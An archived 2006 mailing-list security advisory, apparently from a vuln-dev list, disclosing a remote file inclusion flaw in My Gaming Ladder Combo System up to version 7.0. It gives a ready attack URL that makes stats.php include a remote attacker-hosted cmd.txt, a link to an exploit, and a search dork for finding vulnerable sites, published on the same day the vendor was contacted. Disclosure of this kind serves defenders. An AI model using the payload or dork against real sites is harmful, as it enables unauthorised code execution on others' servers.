Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Advisory: My Gaming Ladder Combo System <= 7.0 Remote File Inclusion Vul

from [Mustafa Can Bjorn IPEKCI] Network Security [Permanent Link]
Subject: Advisory: My Gaming Ladder Combo System <= 7.0 Remote File Inclusion Vulnerability.
Date: Sat, 22 Apr 2006 21:56:47 +0300 

--Security Report--
Advisory: My Gaming Ladder Combo System <= 7.0 Remote File Inclusion 
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 22/04/06 13:37 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MyGamingLadder (http://www.mygamingladder.com/)
Version: 7.0 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to My 
Gaming Ladder Combo System.
Level: Highly Critical
---
How&Example: 
Succesful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[LadderPath]/stats.php?dir[func]=&dir[base]=[FILE]
EXAMPLE -> 

http://[victim]/[LadderPath]/stats.php?dir[func]=&dir[base]=http://yourhost.com/cmd.txt?
---
Timeline:
* 22/04/2006: Vulnerability found.
* 22/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=28
---
Dorks: "Ladder Scripts by http://www.mygamingladder.com";
---
Credits: zipitcs , str0ke , RootShell Security Team and all my friends
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=28
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Advisory: My Gaming Ladder Combo System <= 7.0 Remote File Inclusion Vulnerability., Mustafa Can Bjorn IPEKCI <=
Previous by Date:  vbulletin<--3.0.x SQL Injection, CrAzY . CrAcKeR
Next by Date:  ADVISORY FOR IOPUS SECURE EMAIL ATTACHMENTS, ntwak0
Previous by Thread:  vbulletin<--3.0.x SQL Injection, CrAzY . CrAcKeR
Next by Thread:  ADVISORY FOR IOPUS SECURE EMAIL ATTACHMENTS, ntwak0
Indexes:  [Date] [Thread] [Top] [All Lists]